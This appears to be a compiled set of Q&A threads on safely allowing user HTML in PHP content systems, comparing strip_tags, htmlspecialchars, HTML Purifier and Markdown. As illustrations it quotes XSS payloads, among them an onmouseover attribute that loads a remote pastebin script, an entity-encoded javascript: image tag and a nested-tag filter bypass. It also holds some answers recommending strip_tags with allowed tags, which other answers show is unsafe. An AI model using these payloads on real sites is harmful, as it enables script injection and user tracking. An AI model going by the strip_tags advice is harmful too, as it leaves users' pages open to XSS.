Use WYSIWYG Editor with PHP escape Method - php

I am building a small/test CMS using Php and Mysql.
Everything is working amazingly on the adding, editing, deleting and displaying level, but after finishing my code, I wanted to add a WYSIWYG editor in the Admin back end.
My problem is that I am using escape method to hopefully make my form a bit more secure and try to escape injections, therefore when adding a styled text, image or any other HTML code in my Editor I am getting them printed as line codes on my page(Which is completely right to avoid attacks).
MY ESCAPE METHOD:
function e($text) {
return htmlspecialchars($text, ENT_QUOTES, 'UTF-8');}
Is there any way to work around my escape method (which is think it should not be done because if I can do it every attacker could).
Or should I change my escape method to another method?

If I understand you correctly you are going to allow your users to put some formatting into the text they are going to create. For this you are going to add some WYSISWYG editor. But the question is how to distinguish the formatting and special characters which are allowed from what is not allowed. You need to clean up the text and leave only valid allowed formatting (HTML tags) and remove all malicious JavaScript or HTML.
This is not an easy task like it might sound at the first moment. I can see several approaches here.
Easiest solution to use strip_tags and specify what tags are allowed.
But please keep in mind that strip_tags is not perfect. Let me quote the manual here.
Because strip_tags() does not actually validate the HTML, partial or
broken tags can result in the removal of more text/data than expected.
This function does not modify any attributes on the tags that you
allow using allowable_tags, including the style and onmouseover
attributes that a mischievous user may abuse when posting text that
will be shown to other users.
This is a known issue. And libraries exist which do a better cleanup of HTML and JS to prevent breaks.
A bit more complicated solution would be to use some advanced library to cleanup the HTML code. For example this might be HTML Purifier
Quote from the documentation
HTML Purifier will not only remove all malicious code (better known as
XSS) with a thoroughly audited, secure yet permissive whitelist, it
will also make sure your documents are standards compliant, something
only achievable with a comprehensive knowledge of W3C's
specifications.
The other libraries exist which solve the same task. You can check for example this article where libraries are compared. And finally you might choose the best one.
Completely different approach is to avoid users from writing HTML tags. Ask them to write some other markup instead like this is done on StackOverflow or Basecamp or GitHub. Markdown might be a good approach.
Using simple markup for text allows you to complete avoid issues with broken HTML and JavaScript cause you can escape everything and build HTML markup on your own.
The editor might look like the one I'm using to write this message :)

You can use strip_tags() to remove the unwanted tags. Read about it on this manual:
http://php.net/manual/en/function.strip-tags.php
Example 1 (Based on the manual)
<?php
$text = '<p>Test paragraph, With link.</p>';
# Output: Test paragraph, With link. (Tags are stripped)
echo strip_tags($text);
echo "\n";
# Allow <p> and <a>
#Output: <p>Test paragraph, With link.</p>
echo strip_tags($text, '<p><a>');
?>
I hope this will help you!

Related

CKEditor remove tags server side

We use CKEditor for admins to write articles but also for frontend redactors. Because CKEditor is only JS we want to add some server-side tags stripping to be sure not to leave some or or others bad ones...
The php function strip_tags() make it possible to allow some tags but we prefer to be able to have a blacklist. Also it didn't look very effective.
Do you know a good way ?
Thanks
EDIT : The solution given by #ErwinMoller delete tags but not the content within it.
There's no easy and safe way of allowing some (safe) HTML in PHP. It's simple to strip all HTML, but once you want to start allowing some HTML you run into all kinds of security issues.
Using a library such as HTML Purifier is the best way to go, and it gives you the ability to whitelist or blacklist tags and attributes at the same time as it prevents malicious code.
You can do one thing with strip_tags().
please try justify css on <p> tag. it will be helpful for your view.
Or you can use FILTER_SANITIZE_STRING for filtered string from tags.
please check below code.
$string = filter_var($string, FILTER_SANITIZE_STRING);

Strip tags except specific <span>-s

I'm a little stuck here. I don't know which approach is best and the most secure. I'm working with a REST API and Handlebars.js.
Context: I have user-generated content that could look like this:
<span class="user-link" data-id="12345" user-id="67890">
Name
</span>
Blablabla my comment
<script>
alert("malicious");
</script>
blabla
<b>bold</b>
<span onclick='window.location("http://maliciouswebsite");'>
bla
</span>
Goal : When doing a POST to the API, I want to be able to strip (or encode?) all of the HTML tags, except for the <span class="user-link">[...]</span> one, as I want to render it as pure HTML in the comment list. Anything else should be HTML encoded and showing as text. In the case of any malicious insertion, I would also like to remove any sort of event (like 'onclick' on the span tag), and just keep my "data-id" and "user-id" attributes.
Question : What should my approach be here? I'm fully aware that REGEXes on HTML are very discouraged. Should I make the <span class="user-link">[...]</span> BBCode? Or should I stick some a simple Regex? Should I go with JS or PHP? How should I go about rendering the text safely?
Thank you so mcuh for your time! Any tip/link would immensely help.
My suggestions are
you could restrict the allowed input on client-side
instead of allowing to send HTML, restrict the input and allow less: bbcode or markdown
Handlebars.SafeString() - ref. https://stackoverflow.com/a/21471546/1163786
apply input validation on server-side
apply input validation and filtering on server-side
see below striptags, filtering by whitelist, blacklist
never forget that only Chuck Norris can parse HTML with regex.
The main topic is "Input Filtering and Validation" of incoming user input.
You have asked about a "best practice" or "how to proceed on this problem".
Its described over here:
http://phpsecurity.readthedocs.org/en/latest/Input-Validation.html
https://phpbestpractices.org/#sanitizing-html
For many web apps, simply escaping HTML isn't enough. You probably
want to entirely remove any HTML, or allow a small subset of HTML
through. To do this, use the HTML Purifier library.
But it is extremely slow for complex HTML. Consider setting up a caching solution to store the sanitized result for later use.
You find a code example for working with HTML Purifier when following the last link. The purifier uses a HTML tag whitelist/blacklisting approach. Its slow because filtering is a complex task.
There are other tools out there: http://htmlpurifier.org/comparison
When you restrict the allowed input to markdown, then you could use a markdown parser to prepare the output. This will still parse the whole input, but is faster than applying whitelist/blacklist purification.

PHP "strip_tags" accept all except script

I am creating a Page-Preview before publishing or saving that page. What I have currently encountered that I have forgotten to add <h1> <h2> <h3> etc tags to the allowable list, but I have added them later.
I want to allow ALL HTML tags except the <script> tag, and so far I came up with this list:
public static function tags() {
return '<p><a><hr><br><table><thead><tbody><tr><td><th><tfoot><span><div><ul><ol><li><img>' .
'<canvas><video><object><embed><audio><frame><iframe><label><option><select><option>' .
'<input><textarea><button><form><param><pre><code><small><em><b><u><i><strong><article>' .
'<aside><bdi><details><summary><figure><figcaption><footer><header><hgroup><mark><meter>' .
'<nav><progress><ruby><rt><rp><section><time><wbr><track><source><datalist><output><keygen>' .
'<h1><h2><h3><h4><h5><h6><h7><h8><h9>';
}
So I use this static method like this:
$model->content = strip_tags($_POST['contents'], HTML5Custom::tags());
Have I missed any of the tags there?
I was mostly focusing on AVAILABLE tags in HTML5 specification, and all HTML4 (and lower) tags which are deprecated in HTML5 are not in the list.
Please don't use strip_tags, it is unsafe, and unreliable - read the following discussion on strip_tags for what you should use:
Strip_tags discussion on reddit.com
:: Details of Reddit post ::
strip_tags is one of the common go-to functions used for making user input on web pages safe for display. But contrary to what it sounds like it's for, strip_tags is never, ever, ever the right function to use for this and it has a lot of problems. Here's why:
It can eat legitimate text. It turns "This shows that x<y." into
"This shows that x", and unless it gets a closing '>' it will
continue to eat the rest of the lines in the comment. (It prevents
people from discussing HTML, for example.)
It doesn't prevent typed HTML entities. People can (and do) exploit
that to bypass word filters & spam filters.
Using the second parameter to allow some tags is 100% dangerous. It
starts out innocently: someone wants to permit simple formatting in
user comments and does something like this:
What everyone should know about strip_tags()
strip_tags is one of the common go-to functions used for making user input on web pages safe for display. But contrary to what it sounds like it's for, strip_tags is never, ever, ever the right function to use for this and it has a lot of problems. Here's why:
It can eat legitimate text. It turns "This shows that x<y." into "This shows that x", and unless it gets a closing '>' it will continue to eat the rest of the lines in the comment. (It prevents people from discussing HTML, for example.)
It doesn't prevent typed HTML entities. People can (and do) exploit that to bypass word filters & spam filters.
Using the second parameter to allow some tags is 100% dangerous. It starts out innocently: someone wants to permit simple formatting in user comments and does something like this:
$message = strip_tags($message, '');
But attributes on tags aren't removed. So I could come to your site and post a comment like this:
<b style="color:red;font-size:100pt;text-decoration:blink">hello</b>
Suddenly I can use whatever formatting I want. Or I could do this:
<b style="background:url(http://someserver/transparent.gif);font-weight:normal">hello</b>
Using that I can track users browsing your site without them or you knowing.
Or if I was particularly evil, I could do something like this:
<b onmouseover="s=document.createElement('script');s.src='http://pastebin.com/raw.php?i=j1Vhq2aJ';document.getElementsByTagName('head')[0].appendChild(s)">hello</b>
Using that I could inject my own script into your site, triggered by somebody's cursor moving over my comment. Such a script would run in the user's browser with the full privileges of the page, so it is very dangerous. It could steal or delete private user data. It could alter any part of the page, such as to display fake messages or shock images. It could exploit your site's reputation to trick users into downloading malware. A single comment could even spread across the site rapidly, virally by submitting new comments from the user who views it.
You can't overstate the danger of using that second parameter. If someone cared enough, it could be leveraged to wreak total havoc.
The second parameter doesn't work decently even for known safe text. Usage like strip_tags('text in which we want line breaks<br/>but no formatting', '<br>') still strips the break because it sees the '/' as part of the tag name.
If you simply want to prevent HTML and formatting in user-submitted input, to display text on a web page exactly as typed, the correct function is htmlspecialchars. Follow that with nl2br if you want to display multiple lines, otherwise the text will appear on one line. (++Edit: You should know what character set you're using (and if you don't, aim to use UTF-8 everywhere as it's becoming a web standard). If you're using a weird not-ASCII-compatible character set, you must specify that as the second parameter to htmlspecialchars for it to work properly.)
For when you want to allow formatting, there are proper pre-designed libraries out there for allowing safe use of various syntaxes, including HTML, Markdown, BBCode, and Wikitext.
For when you want to permit formatting, you should use a proper library designed for doing this. Markdown (as used on Reddit) is a user-friendly formatting syntax, but as flyingfirefox has explained below, it allows HTML and is not safe on its own. (It is a formatter and not a sanitizer). Use of HTML and/or Markdown for formatting can be made fully safe with a sanitizer like HTML Purifier, which does what strip_tags was supposed to do. BBCode is another option.
If you feel the need to make your own formatter, even a simple one, look at existing implementations to see what they do because there are a surprising number of subtleties involved in making them reliable and safe.
The only appropriate time to use strip_tags would be to remove HTML that was supposed to be there, and now you're converting to a non-HTML format. For example, if you have some content formatted as HTML and now you want to write it to a plain text file, then using strip_tags, followed by htmlspecialchars_decode or html_entity_decode will do that. (In this case, strip_tags won't have the flaw of removing legitimate text because the text should have already been properly escaped as entities when it was made into HTML in the first place.)
Generally, strip_tags is just the wrong function. Never use it. And if you do, absolutely never use the second parameter, because sooner or later someone will abuse it.
In this case it's going to be easier to blacklist as opposed to whitelist, otherwise you'll have to constantly revisit this script and update it.
Also, strip_tags() is unreliable for making HTML safe, it's still possible to inject javascript in attributes eg onmouseover="alert('hax'); and it will get past strip_tags() just fine.
My go-to library for HTML filtering/sanitation is HTML Purifier.

people are hacking my filter

i am using regex and blocking out the words document|window|alert|onmouseover|onclick to prevent xss, and people seem to be able to bypassing it by just typing doc\ument, how do i fix this ?
thanks!
--
edit: what about preventing xss server side? maybe refuse to serve any file that contains stuff in a GET variable?
Obviously, you would have to supply some meaningful detail to get any serious answer for your problem at hand.
As #David Dorward notes, the most easy option is to escape all HTML entities. That disables all HTML, but you don't have to deal with the plight of fighting XSS attacks.
If you need to suppot HTML, consider using a pre-made Anti-XSS filter like HTML purifier that promises to reliably block such attempts.
HTML Purifier is a standards-compliant HTML filter library written in PHP. HTML Purifier will not only remove all malicious code (better known as XSS) with a thoroughly audited, secure yet permissive whitelist, it will also make sure your documents are standards compliant, something only achievable with a comprehensive knowledge of W3C's specifications.
The simple option is to disallow any HTML and the convert all &, < and > to their respective entities (&, < and >).
The more complicated approach is to run the input through an HTML parser, apply a whitelist to element and attribute names, then serialise it back to HTML.
Is this system at all important/critical?
If so, turn it off immediately and hire a security consultant to secure it for you.
Security is a hard problem. Don't think you can get it right first time, because you won't.
If this is just a system you play around with?
Trying to stop XSS by filtering particular words is a losing battle. If you don't want HTML insertion, just HTML-encode everything. If you do want some HTML, then you need to parse the HTML, make sure it's valid and isn't going to break the page, and only then make sure it doesn't contain any elements or attributes that you don't want.
I had the same problem and only asked the question yesterday. Personally rather than deleteing tags I created a list of all the tags I did want. Using the PHP command strip_tags is what I use now.
strip_tags ( string $str [, string $allowable_tags ] )
Using this command you can simply apply it to your filter like this.
text entered:
<b>Hi</b><malicious tag>
strip_tags("<b>Hi</b><malicious tag>","<b>")
This would output <b>Hi</b>.

How can I allow my user to insert HTML code, without risks? (not only technical risks)

I developed a web application, that permits my users to manage some aspects of a web site dynamically (yes, some kind of cms) in LAMP environment (debian, apache, php, mysql)
Well, for example, they create a news in their private area on my server, then this is published on their website via a cURL request (or by ajax).
The news is created with an WYSIWYG editor (fck at moment, probably tinyMCE in the next future).
So, i can't disallow the html tags, but how can i be safe?
What kind of tags i MUST delete (javascripts?)?
That in meaning to be server-safe.. but how to be 'legally' safe?
If an user use my application to make xss, can i be have some legal troubles?
If you are using php, an excellent solution is to use HTMLPurifier. It has many options to filter out bad stuff, and as a side effect, guarantees well formed html output. I use it to view spam which can be a hostile environment.
It doesn't really matter what you're looking to remove, someone will always find a way to get around it. As a reference take a look at this XSS Cheat Sheet.
As an example, how are you ever going to remove this valid XSS attack:
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
Your best option is only allow a subset of acceptable tags and remove anything else. This practice is know as White Listing and is the best method for preventing XSS (besides disallowing HTML.)
Also use the cheat sheet in your testing; fire as much as you can at your website and try to find some ways to perform XSS.
The general best strategy here is to whitelist specific tags and attributes that you deem safe, and escape/remove everything else. For example, a sensible whitelist might be <p>, <ul>, <ol>, <li>, <strong>, <em>, <pre>, <code>, <blockquote>, <cite>. Alternatively, consider human-friendly markup like Textile or Markdown that can be easily converted into safe HTML.
Rather than allow HTML, you should have some other markup that can be converted to HTML. Trying to strip out rogue HTML from user input is nearly impossible, for example
<scr<script>ipt etc="...">
Removing from this will leave
<script etc="...">
Kohana's security helper is pretty good. From what I remember, it was taken from a different project.
However I tested out
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
From LFSR Consulting's answer, and it escaped it correctly.
For a C# example of white list approach, which stackoverflow uses, you can look at this page.
If it is too difficult removing the tags you could reject the whole html-data until the user enters a valid one.
I would reject html if it contains the following tags:
frameset,frame,iframe,script,object,embed,applet.
Also tags which you want to disallow are: head (and sub-tags),body,html because you want to provide them by yourself and you do not want the user to manipulate your metadata.
But generally speaking, allowing the user to provide his own html code always imposes some security issues.
You might want to consider, rather than allowing HTML at all, implementing some standin for HTML like BBCode or Markdown.
I use this php strip_tags function because i want user can post safely and i allow just few tags which can be used in post in this way nobody can hack your website through script injection so i think strip_tags is best option
Clich here for code for this php function
It is very good function in php you can use it
$string = strip_tags($_POST['comment'], "<b>");

Categories